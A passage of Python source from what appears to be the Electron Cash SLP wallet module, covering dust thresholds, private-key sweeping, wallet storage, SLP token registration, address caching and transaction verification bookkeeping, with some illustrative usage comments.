from .bitcoin import *
from .version import *
from .keystore import load_keystore, Hardware_KeyStore, Imported_KeyStore, BIP32_KeyStore, xpubkey_to_address
from . import networks
from . import keystore
from .storage import multisig_type, WalletStorage
from . import transaction
from .transaction import Transaction, InputValueMissing
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV, SPVDelegate
from . import schnorr
from . import ecc_fast
from .blockchain import NULL_HASH_HEX
from . import paymentrequest
from .paymentrequest import PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .paymentrequest import InvoiceStore
from .contacts import Contacts
from . import cashacct
from .slp import SlpMessage, SlpParsingError, SlpInvalidOutputMessage, SlpUnsupportedSlpTokenType, SlpNoMintingBatonFound, OpreturnError
from . import slp_validator_0x01, slp_validator_0x01_nft1, slp_slpdb_validator
from .slp_graph_search import slp_gs_mgr
def _(message): return message
TX_STATUS = [
_('Unconfirmed parent'),
_('Low fee'),
_('Unconfirmed'),
_('Not Verified'),
]
del _
from .i18n import _
DEFAULT_CONFIRMED_ONLY = False
def relayfee(network):
RELAY_FEE = 5000
MAX_RELAY_FEE = 50000
f = network.relay_fee if network and network.relay_fee else RELAY_FEE
return min(f, MAX_RELAY_FEE)
def dust_threshold(network):
# Change < dust threshold is added to the tx fee
#return 182 * 3 * relayfee(network) / 1000 # original Electrum logic
#return 1 # <-- was this value until late Sept. 2018
return 546 # hard-coded Bitcoin Cash dust threshold. Was changed to this as of Sept. 2018
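# Illustrative sketch (not wallet code): how a change output below the dust
# threshold ends up folded into the fee when a transaction is built, per the
# comment above. Variable names are invented.
#
#   change = total_inputs - amount_sent - fee
#   if 0 < change < dust_threshold(network):     # 546 sats
#       fee += change                            # dropped change goes to the miner
#       change = 0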
def sweep_preparations(privkeys, network, imax=100):
class InputsMaxxed(Exception):
pass
def append_utxos_to_inputs(inputs, pubkey, txin_type):
if txin_type == 'p2pkh':
address = Address.from_pubkey(pubkey)
else:
address = PublicKey.from_pubkey(pubkey)
sh = address.to_scripthash_hex()
u = network.synchronous_get(('blockchain.scripthash.listunspent', [sh]))
for item in u:
if len(inputs) >= imax:
raise InputsMaxxed()
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = item['tx_pos']
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = bitcoin.public_key_from_private_key(privkey, compressed)
append_utxos_to_inputs(inputs, pubkey, txin_type)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
try:
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
elif txin_type == 'p2sh':
raise ValueError(_("The specified WIF key '{}' is a p2sh WIF key. These key types cannot be swept.").format(sec))
except InputsMaxxed:
pass
if not inputs:
raise ValueError(_('No inputs found. (Note that inputs need to be confirmed)'))
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100, sign_schnorr=False):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [(TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
tx.BIP_LI01_sort()
tx.sign(keypairs)
return tx
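# Illustrative usage sketch for sweep() (not executed here). It assumes a
# connected Network instance and a config object with estimate_fee(); the WIF
# string, destination address and broadcast call are placeholders, not real data.
#
#   from .address import Address
#   wif_keys = ['<WIF-encoded private key>']
#   dest = Address.from_string('bitcoincash:qq...')
#   tx = sweep(wif_keys, network, config, dest)   # fee is estimated when fee=None
#   network.broadcast_transaction(tx)             # hypothetical broadcast step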
class Abstract_Wallet(PrintError, SPVDelegate):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = PACKAGE_VERSION
self.pre_release_tag = PRE_RELEASE_TAG
self.storage = storage
self.thread = None # this is used by the qt main_window to store a QThread. We just make sure it's always defined as an attribute here.
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
# CashAccounts subsystem. Its network-dependent layer is started in
# start_threads. Note: object instantiation should be lightweight here.
# self.cashacct.load() is called later in this function to load data.
self.cashacct = cashacct.CashAcct(self)
finalization_print_error(self.cashacct) # debug object lifecycle
# slp graph databases for token type 1 and NFT1
self.slp_graph_0x01, self.slp_graph_0x01_nft = None, None
self.weak_window = None # Some of the GUI classes, such as the Qt ElectrumWindow, use this to refer back to themselves. This should always be a weakref.ref (Weak.ref), or None
# Removes defunct entries from self.pruned_txo asynchronously
self.pruned_txo_cleaner_thread = None
# Cache of Address -> (c,u,x) balance. This cache is used by
# get_addr_balance to significantly speed it up (it is called a lot).
# Cache entries are invalidated when tx's are seen involving this
# address (address history changes). Entries to this cache are added
# only inside get_addr_balance.
# Note that this data structure is touched by the network and GUI
# thread concurrently without the use of locks, because Python GIL
# allows us to get away with such things. As such do not iterate over
# this dict, but simply add/remove items to/from it in 1-liners (which
# Python's GIL makes thread-safe implicitly).
self._addr_bal_cache = {}
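# Illustrative examples (not executed) of the thread-safe 1-liner access
# pattern described above; the tuple layout (c, u, x) mirrors the convention
# mentioned in the comment.
#
#   self._addr_bal_cache[addr] = (c, u, x)        # atomic under the GIL
#   self._addr_bal_cache.pop(addr, None)          # atomic invalidation
#   # avoid: for a in self._addr_bal_cache: ...   # may race with other threads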
# We keep a frozenset cache of the wallet's receiving and change addresses so
# that is_mine() checks are O(1) set lookups rather than O(N) list scans. This creates/resets that cache.
self.invalidate_address_set_cache()
self.gap_limit_for_change = 20 # constant
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
# Frozen addresses
frozen_addresses = storage.get('frozen_addresses',[])
self.frozen_addresses = set(Address.from_string(addr)
for addr in frozen_addresses)
# Frozen coins (UTXOs) -- note that we have 2 independent levels of "freezing": address-level and coin-level.
# The two types of freezing are flagged independently of each other. A coin is 'spendable' only if it
# passes BOTH checks: neither its address nor the coin itself is frozen.
self.frozen_coins = set(storage.get('frozen_coins', []))
self.frozen_coins_tmp = set() # in-memory only
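# Illustrative sketch (not wallet code) of the spendability rule above; the
# "txid:n" coin-name format is an assumption for this example only.
#
#   def _is_spendable(wallet, utxo):
#       addr_ok = utxo['address'] not in wallet.frozen_addresses
#       name = '%s:%d' % (utxo['prevout_hash'], utxo['prevout_n'])
#       coin_ok = (name not in wallet.frozen_coins
#                  and name not in wallet.frozen_coins_tmp)
#       return addr_ok and coin_ok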
# address -> list(txid, height)
history = storage.get('addr_history',{})
self._history = self.to_Address_dict(history)
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
# The only lock. We used to have two here. That was more technical debt
# without much purpose. 1 lock is sufficient. In particular data
# structures that are touched by the network thread as well as the GUI
# (such as self.transactions, history, etc) need to be synchronized
# using this mutex.
self.lock = threading.RLock()
# load requests
requests = self.storage.get('payment_requests', {})
for key, req in requests.items():
req['address'] = Address.from_string(key)
self.receive_requests = {req['address']: req
for req in requests.values()}
# Transactions pending verification. A map from tx hash to transaction
# height. Access is contended so a lock is needed. Client code should
# use get_unverified_tx to get a thread-safe copy of this dict.
self.unverified_tx = defaultdict(int)
# Verified transactions. Each value is a (height, timestamp, block_pos) tuple. Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
# cashacct is started in start_threads, but it needs to have relevant
# data here, before the below calls happen
self.cashacct.load()
# Now, finally, after object is constructed -- we can do this
self.load_keystore_wrapper()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.check_history()
# Print debug message on finalization
finalization_print_error(self, "[{}/{}] finalized".format(type(self).__name__, self.diagnostic_name()))
@property
def is_slp(self):
''' Note that the various Slp_* classes explicitly write to storage
to set the proper wallet_type on construction unconditionally, so
this should always be valid for SLP wallets. '''
return "slp_" in self.storage.get('wallet_type', '')
@classmethod
def to_Address_dict(cls, d):
'''Convert a dict of strings to a dict of Address objects.'''
return {Address.from_string(text): value for text, value in d.items()}
@classmethod
def from_Address_dict(cls, d):
'''Convert a dict of Address objects to a dict of strings.'''
return {addr.to_storage_string(): value
for addr, value in d.items()}
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_keystore_wrapper(self):
""" Loads the keystore, but also tries to preserve derivation(s). Older
Electron Cash versions would not save the derivation for all keystore
types. So this function ensures:
1. That on first run, we store the keystore_derivations to top-level
storage (which is preserved always).
2. On subsequent runs we try and load the keystore_derivations from
storage and restore them if the individual keystore.derivation data
items were lost (because user loaded wallet with older Electron
Cash).
This function is provided to allow users to switch between old and new
EC versions. In the future if we deprecate the wallet format, or if
enough time has passed, this function may be removed and the simple
self.load_keystore() may be used instead. """
self.load_keystore()
if not hasattr(self, 'get_keystores'):
return
from .keystore import Deterministic_KeyStore, Old_KeyStore
keystores = self.get_keystores()
keystore_derivations = self.storage.get('keystore_derivations', [])
if len(keystore_derivations) != len(keystores):
keystore_derivations = [None] * len(keystores)
updated, updated_ks, updated_st = False, False, False
for i, keystore in enumerate(keystores):
if i == 0 and isinstance(keystore, Deterministic_KeyStore) and not keystore.seed_type:
# Attempt to update keystore.seed_type
if isinstance(keystore, Old_KeyStore):
keystore.seed_type = 'old'
updated_st = True
else:
# attempt to restore the seed_type based on wallet saved "seed_type"
typ = self.storage.get('seed_type')
if typ in ('standard', 'electrum'):
keystore.seed_type = 'electrum'
updated_st = True
elif typ == 'bip39':
keystore.seed_type = 'bip39'
updated_st = True
saved_der = keystore_derivations[i]
der = (keystore.has_derivation() and keystore.derivation) or None
if der != saved_der:
if der:
# keystore had a derivation, but top-level storage did not
# (this branch is typically taken on first run after
# restoring from seed or creating a new wallet)
keystore_derivations[i] = saved_der = der
updated = True
elif saved_der:
# we had a derivation but keystore did not. This branch is
# taken if the user has loaded this wallet with an older
# version of Electron Cash. Attempt to restore their
# derivation item in keystore.
keystore.derivation = saved_der # write to keystore
updated_ks = True # tell it to re-save
if updated:
self.print_error("Updated keystore_derivations")
self.storage.put('keystore_derivations', keystore_derivations)
if updated_ks or updated_st:
if updated_ks:
self.print_error("Updated keystore (lost derivations restored)")
if updated_st:
self.print_error("Updated keystore (lost seed_type restored)")
self.save_keystore()
if any((updated, updated_ks, updated_st)):
self.storage.write()
@profiler
def load_transactions(self):
txi = self.storage.get('txi', {})
self.txi = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txi.items()
# skip empty entries to save memory and disk space
if value}
txo = self.storage.get('txo', {})
self.txo = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txo.items()
# skip empty entries to save memory and disk space
if value}
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
self.pruned_txo_values = set(self.pruned_txo.values())
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if not self.txi.get(tx_hash) and not self.txo.get(tx_hash) and (tx_hash not in self.pruned_txo_values):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
self.cashacct.remove_transaction_hook(tx_hash)
self.slpv1_validity = self.storage.get('slpv1_validity', {})
self.token_types = self.storage.get('token_types', {})
self.tx_tokinfo = self.storage.get('tx_tokinfo', {})
# load up slp_txo as defaultdict-of-defaultdict-of-dicts
self._slp_txo = defaultdict(lambda: defaultdict(dict))
for addr, addrdict in self.to_Address_dict(self.storage.get('slp_txo',{})).items():
for txid, txdict in addrdict.items():
# need to do this iteration since json stores int keys as decimal strings.
self._slp_txo[addr][txid] = {int(idx):d for idx,d in txdict.items()}
ok = self.storage.get('slp_data_version', False)
if ok != 3:
self.rebuild_slp()
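# Illustrative note (standalone example, not wallet code): JSON object keys are
# always strings, so an int-keyed dict must be converted back after a round
# trip, which is why the loop above rebuilds the inner dict with int() keys.
#
#   import json
#   d = {0: 'a', 1: 'b'}
#   restored = json.loads(json.dumps(d))           # {'0': 'a', '1': 'b'}
#   fixed = {int(k): v for k, v in restored.items()}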
@profiler
def save_transactions(self, write=False):
with self.lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
txi = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txi.items()
# skip empty entries to save memory and disk space
if value}
txo = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txo.items()
# skip empty entries to save memory and disk space
if value}
self.storage.put('txi', txi)
self.storage.put('txo', txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
history = self.from_Address_dict(self._history)
self.storage.put('addr_history', history)
### SLP stuff
self.storage.put('slpv1_validity', self.slpv1_validity)
self.storage.put('token_types', self.token_types)
self.storage.put('slp_txo', self.from_Address_dict(self._slp_txo))
self.storage.put('tx_tokinfo', self.tx_tokinfo)
self.storage.put('slp_data_version', 3)
if write:
self.storage.write()
def activate_slp(self):
# This gets called in two situations:
# - Upon wallet startup, it checks config to see if SLP should be enabled.
# - During wallet operation, on a network reconnect, to "wake up" the validator -- According to JSCramer this is required. TODO: Investigate why that is
with self.lock:
for tx_hash, tti in self.tx_tokinfo.items():
# Fire up validation on unvalidated txes
try:
tx = self.transactions[tx_hash]
self.slp_check_validation(tx_hash, tx)
except KeyError:
continue
_add_token_hex_re = re.compile('^[a-f0-9]{64}$')
def add_token_type(self, token_id, entry, check_validation=True):
if not isinstance(token_id, str) or not self._add_token_hex_re.match(token_id):
# Paranoia: we enforce canonical hex string as lowercase to avoid
# problems with the same token-id being added as upper or lowercase
# by client code. This is because token_id becomes a dictionary key
# in various places and it not being identical would create chaos.
raise ValueError('token_id must be a lowercase hex string of exactly 64 characters!')
with self.lock:
self.token_types[token_id] = dict(entry)
self.storage.put('token_types', self.token_types)
for tx_hash, tti in self.tx_tokinfo.items():
# Fire up validation on unvalidated txes of matching token_id
try:
if tti['token_id'] == token_id and check_validation:
tx = self.transactions[tx_hash]
self.slp_check_validation(tx_hash, tx)
except KeyError: # This catches the case where tx_tokinfo was set to {}
continue
def add_token_safe(self, token_class: str, token_id: str, token_name: str,
decimals_divisibility: int,
*, error_callback=None, allow_overwrite=False,
write_storage=True) -> bool:
''' This code was refactored from main_window.py to allow other
subsystems (eg CLI/RPC, other platforms, etc) to add tokens.
This function does some minimal sanity checks and returns True
on success or False on failure. The optional error_callback
is called on False return. The callback takes a single translated string
argument which is an error message (suitable for display to the user).
On success (True) return, this method ends up calling
self.add_token_type(), and also will end up saving the changes to
wallet storage if write_storage=True (the default).
This function is thread-safe. '''
token_name = token_name.strip()
token_id = token_id.strip().lower()
# Check for duplication error
d = self.token_types.get(token_id)
group_id = d.get('group_id', None) if d else None
if d is not None and not allow_overwrite:
if error_callback:
error_callback(_('Token with this hash id already exists'))
return False
for tid, d in self.token_types.copy().items(): # <-- must take a snapshot-copy here since we aren't holding locks and other threads may modify this dict as we iterate
if d['name'] == token_name and tid != token_id:
token_name = token_name + "-" + token_id[:3]
break
# Hash id validation
gothex = self._add_token_hex_re.match(token_id)
if not gothex:
if error_callback:
error_callback(_('Invalid token_id hash'))
return False
# Token name validation
# if len(token_name) < 1 or len(token_name) > 20:
# if error_callback:
# error_callback(_('Token name should be 1-20 characters'))
# return False
new_entry = {
'class' : token_class,
'name' : token_name,
'decimals' : decimals_divisibility,
}
if token_class == "SLP65":
if group_id is None:
new_entry['group_id'] = "?"
else:
new_entry['group_id'] = group_id
self.add_token_type(token_id, new_entry)
self.save_transactions(bool(write_storage))
return True
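# Illustrative usage sketch for add_token_safe() (not executed); the token id,
# name and callback below are placeholders, not real SLP data.
#
#   ok = wallet.add_token_safe(
#       'SLP1',                 # token_class, as built elsewhere via 'SLP%d' % type
#       'ab' * 32,              # placeholder 64-char lowercase hex token_id
#       'EXAMPLE-TOKEN', 8,
#       error_callback=lambda msg: print('add token failed:', msg))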
def add_token_from_genesis_tx(self, tx_or_raw, *, error_callback=None, allow_overwrite=True) -> SlpMessage:
''' Returns None on failure, optionally calling error_callback
with a translated UI-suitable error message. Returns a valid
SlpMessage object on success. In exceptional circumstances (garbage
inputs), may raise.
Note that unlike the other add_token_* functions, this version defaults
to allow_overwrite = True.'''
tx = tx_or_raw
if not isinstance(tx, Transaction):
tx = Transaction(tx)
def fail(msg):
if error_callback:
error_callback(msg)
return None
token_id = tx.txid()
try:
slpMsg = SlpMessage.parseSlpOutputScript(tx.outputs()[0][1])
except SlpUnsupportedSlpTokenType as e:
return fail(_("Unsupported SLP token version/type - %r.")%(e.args[0],))
except SlpInvalidOutputMessage as e:
return fail(_("This transaction does not contain a valid SLP message.\nReason: %r.")%(e.args,))
if slpMsg.transaction_type != 'GENESIS':
return fail(_("This is an SLP transaction, however it is not a genesis transaction."))
token_name = slpMsg.op_return_fields['ticker'].decode('utf-8') or slpMsg.op_return_fields['token_name'].decode('utf-8')
decimals = slpMsg.op_return_fields['decimals']
token_class = 'SLP%d' % (slpMsg.token_type,)
if self.add_token_safe(token_class, token_id, token_name, decimals, error_callback=fail, allow_overwrite=allow_overwrite):
return slpMsg
else:
return None
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
self.cashacct.save()
if write:
self.storage.write()
def clear_history(self):
with self.lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.pruned_txo = {}
self.pruned_txo_values = set()
self.save_transactions()
self._addr_bal_cache = {}
self._history = {}
self.tx_addr_hist = defaultdict(set)
self.cashacct.on_clear_history()
@profiler
def build_reverse_history(self):
self.tx_addr_hist = defaultdict(set)
for addr, hist in self._history.items():
for tx_hash, h in hist:
self.tx_addr_hist[tx_hash].add(addr)
@profiler
def check_history(self):
save = False
my_addrs = [addr for addr in self._history if self.is_mine(addr)]
for addr in set(self._history) - set(my_addrs):
self._history.pop(addr)
save = True
for addr in my_addrs:
hist = self._history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo_values or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
self.cashacct.save()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
addr_dict = {
'receiving': [addr.to_storage_string()
for addr in self.receiving_addresses],
'change': [addr.to_storage_string()
for addr in self.change_addresses],
}
self.storage.put('addresses', addr_dict)
def load_addresses(self):
d = self.storage.get('addresses', {})
if not isinstance(d, dict):
d = {}
self.receiving_addresses = Address.from_strings(d.get('receiving', []))
self.change_addresses = Address.from_strings(d.get('change', []))
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_addresses()
self.save_transactions()
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx()
self.storage.write()
def is_up_to_date(self):
with self.lock: return self.up_to_date
def is_fully_settled_down(self):
''' Returns True iff the wallet is up to date and its synchronizer
and verifier aren't busy doing work, and its pruned_txo_values list
is currently empty. This is used as a final check by the Qt GUI
to decide if it should do a final refresh of all tabs in some cases.'''
with self.lock:
ret = self.up_to_date
if ret and self.verifier:
ret = self.verifier.is_up_to_date()
if ret and self.synchronizer:
ret = self.synchronizer.is_up_to_date()
ret = ret and not self.pruned_txo_values
return bool(ret)
def set_label(self, name, text=None, save=True):
with self.lock:
if isinstance(name, Address):
name = name.to_storage_string()
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
if save:
self.save_labels()
return changed
def save_labels(self):
self.storage.put('labels', self.labels)
def invalidate_address_set_cache(self):
"""This should be called from functions that add/remove addresses
from the wallet to ensure the address set caches are empty, in
particular from ImportedWallets which may add/delete addresses
thus the length check in is_mine() may not be accurate.
Deterministic wallets can neglect to call this function since their
address sets only grow and never shrink and thus the length check
of is_mine below is sufficient."""
self._recv_address_set_cached, self._change_address_set_cached = frozenset(), frozenset()
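# Illustrative sketch (hypothetical mutator, not part of this class): any code
# path that adds or removes addresses should call the method above so the
# frozenset caches used by is_mine()/is_change() are rebuilt, e.g.:
#
#   def remove_imported_address(self, addr):
#       self.receiving_addresses.remove(addr)
#       self.invalidate_address_set_cache()
#       self.save_addresses()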
def is_mine(self, address):
"""Note this method assumes that the entire address set is
composed of self.get_change_addresses() + self.get_receiving_addresses().
In subclasses, if that is not the case -- REIMPLEMENT this method!"""
assert not isinstance(address, str)
# assumption here is get_receiving_addresses and get_change_addresses
# are cheap constant-time operations returning a list reference.
# If that is not the case -- reimplement this function.
ra, ca = self.get_receiving_addresses(), self.get_change_addresses()
# Detect if sets changed (addresses added/removed).
# Note the functions that add/remove addresses should invalidate this
# cache using invalidate_address_set_cache() above.
if len(ra) != len(self._recv_address_set_cached):
# re-create cache if lengths don't match
self._recv_address_set_cached = frozenset(ra)
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
# Do a 2 x O(1) lookup using sets rather than 2 x O(N) lookups
# if we were to use the address lists (this was the previous way).
# For small wallets it doesn't matter -- but for wallets with 5k or 10k
# addresses, it starts to add up since is_mine() is called frequently
# especially while downloading address history.
return (address in self._recv_address_set_cached
or address in self._change_address_set_cached)
def is_change(self, address):
assert not isinstance(address, str)
ca = self.get_change_addresses()
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
return address in self._change_address_set_cached
def get_address_index(self, address):
try:
return False, self.receiving_addresses.index(address)
except ValueError:
pass
try:
return True, self.change_addresses.index(address)
except ValueError:
pass
assert not isinstance(address, str)
raise Exception("Address {} not found".format(address))
def export_private_key(self, address, password):
""" extended WIF format """
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
return bitcoin.serialize_privkey(pk, compressed, self.txin_type)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def add_unverified_tx(self, tx_hash, tx_height):
with self.lock:
if tx_height == 0 and tx_hash in self.verified_tx:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.merkle_roots.pop(tx_hash, None)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
self.unverified_tx[tx_hash] = tx_height
self.cashacct.add_unverified_tx_hook(tx_hash, tx_height)
def add_verified_tx(self, tx_hash, info, header):
# Remove from the unverified map and add to the verified map.
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.cashacct.add_verified_tx_hook(tx_hash, info, header)
self.network.trigger_callback('verified2', self, tx_hash, height, conf, timestamp)
def verification_failed(self, tx_hash, reason):
''' TODO: Notify gui of this if it keeps happening, try a different
server, rate-limited retries, etc '''
self.cashacct.verification_failed_hook(tx_hash, reason)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return self.unverified_tx.copy()
def get_unverified_tx_pending_count(self):
''' Returns the number of unverified tx's that are confirmed and are
still in process and should be verified soon.'''
with self.lock:
return len([1 for height in self.unverified_tx.values() if height > 0])
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
if txs: self.cashacct.undo_verifications_hook(txs)
if txs:
self._addr_bal_cache = {} # this is probably not necessary -- as the receive_history_callback will invalidate bad cache items -- but just to be paranoid we clear the whole balance cache on reorg anyway as a safety measure
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" return the height and timestamp of a verified transaction. """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, 0
else:
return 0, 0, 0
def get_tx_block_hash(self, tx_hash):
''' Only works for tx's in wallet, for which we know the height. '''
height, ign, ign2 = self.get_tx_height(tx_hash)
return self.get_block_hash(height)
def get_block_hash(self, height):
'''Convenience method equivalent to Blockchain.get_hash(), except our
version returns None instead of NULL_HASH_HEX on a 'not found' header. '''
ret = None
if self.network and height is not None and height >= 0 and height <= self.get_local_height():
bchain = self.network.blockchain()
if bchain:
ret = bchain.get_hash(height)
if ret == NULL_HASH_HEX:
# if hash was NULL (all zeroes), prefer to return None
ret = None
return ret
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
def is_found(self):
return any(value for value in self._history.values())
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.get_address_history(address))
def get_tx_delta(self, tx_hash, address):
"""Effect of tx on address."""
assert isinstance(address, Address)
# pruned
if tx_hash in self.pruned_txo_values:
return None
delta = 0
# subtract the value of coins sent from address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
WalletDelta = namedtuple("WalletDelta", "is_relevant, is_mine, v, fee")
WalletDelta2 = namedtuple("WalletDelta2", WalletDelta._fields + ("spends_coins_mine",))
def get_wallet_delta(self, tx) -> WalletDelta:
return self._get_wallet_delta(tx, ver=1)
def _get_wallet_delta(self, tx, *, ver=1) -> Union[WalletDelta, WalletDelta2]:
""" Effect of tx on wallet """
assert ver in (1, 2)
is_relevant = False
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
spends_coins_mine = list()
for item in tx.inputs():
addr = item['address']
if self.is_mine(addr):
is_mine = True
is_relevant = True
prevout_hash = item['prevout_hash']
prevout_n = item['prevout_n']
d = self.txo.get(prevout_hash, {}).get(addr, [])
for n, v, cb in d:
if n == prevout_n:
value = v
if ver == 2:
spends_coins_mine.append(f'{prevout_hash}:{prevout_n}')
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for _type, addr, value in tx.outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
if ver == 1:
return self.WalletDelta(is_relevant, is_mine, v, fee)
return self.WalletDelta2(is_relevant, is_mine, v, fee, spends_coins_mine)
TxInfo = namedtuple("TxInfo", "tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n")
class StatusEnum(Enum):
Unconfirmed = auto()
NotVerified = auto()
Confirmed = auto()
Signed = auto()
Unsigned = auto()
PartiallySigned = auto()
TxInfo2 = namedtuple("TxInfo2", TxInfo._fields + ("status_enum",))
def get_tx_info(self, tx) -> TxInfo:
""" Return information for a transaction """
return self._get_tx_info(tx, self.get_wallet_delta(tx), ver=1)
def get_tx_extended_info(self, tx) -> Tuple[WalletDelta2, TxInfo2]:
""" Get extended information for a transaction, combined into 1 call (for performance) """
delta2 = self._get_wallet_delta(tx, ver=2)
info2 = self._get_tx_info(tx, delta2, ver=2)
return (delta2, info2)
def _get_tx_info(self, tx, delta, *, ver=1) -> Union[TxInfo, TxInfo2]:
""" get_tx_info implementation """
assert ver in (1, 2)
if isinstance(delta, self.WalletDelta):
is_relevant, is_mine, v, fee = delta
else:
is_relevant, is_mine, v, fee, __ = delta
exp_n = None
can_broadcast = False
label = ''
height = conf = timestamp = None
status_enum = None
